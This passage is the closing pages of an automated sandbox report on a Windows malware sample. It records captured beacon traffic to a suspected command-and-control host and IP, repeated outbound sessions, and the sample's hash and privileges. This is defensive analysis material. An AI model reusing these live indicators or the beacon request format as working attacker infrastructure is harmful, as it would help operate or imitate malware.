1339 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 34 39 36 37 33 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 38 32 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 54 50 79 44 6a 71 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2149673,"time":1635061582,"rand_str":"TPyDjq"}0

Oct 24, 2021 09:46:22.986057997 CEST

1339 OUT POST /api/?sid=2149673&key=2f27b215dee998f785c084fa1eb07300 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:23.135428905 CEST

1340 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:23 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0

Copyright Joe Security LLC 2021 Page 56 of 58

Page 57: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

Session ID Source IP Source Port Destination IP Destination Port Process

90 192.168.2.5 49878 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

91 192.168.2.5 49879 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

92 192.168.2.5 49880 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

93 192.168.2.5 49881 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

94 192.168.2.5 49882 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

95 192.168.2.5 49883 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

96 192.168.2.5 49884 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

97 192.168.2.5 49885 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

98 192.168.2.5 49886 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

99 192.168.2.5 49887 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Copyright Joe Security LLC 2021 Page 57 of 58

Page 58: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

Joe Sandbox Cloud Basic 33.0.0 White Diamond

Code Manipulations

Statistics

System Behavior

Disassembly

Code Analysis

Copyright Joe Security LLC

File ActivitiesFile Activities

Registry ActivitiesRegistry Activities

Start time: 09:46:10

Start date: 24/10/2021

Path: C:\Users\user\Desktop\7PPXbfDkRN.exe

Wow64 process (32bit): false

Commandline: 'C:\Users\user\Desktop\7PPXbfDkRN.exe'

Imagebase: 0x7ff6419c0000

File size: 1413632 bytes

MD5 hash: 1614D9ADFB1903A189E6EFD9B6DC4077

Has elevated privileges: true

Has administrator privileges: true

Programmed in: C, C++ or other language

Reputation: low

Show Windows behavior

Show Windows behavior

Analysis Process: 7PPXbfDkRN.exe PID: 5172 Parent PID: 6124Analysis Process: 7PPXbfDkRN.exe PID: 5172 Parent PID: 6124

General

File ReadFile Read

Key CreatedKey Created

Key Value CreatedKey Value Created

Copyright Joe Security LLC 2021 Page 58 of 58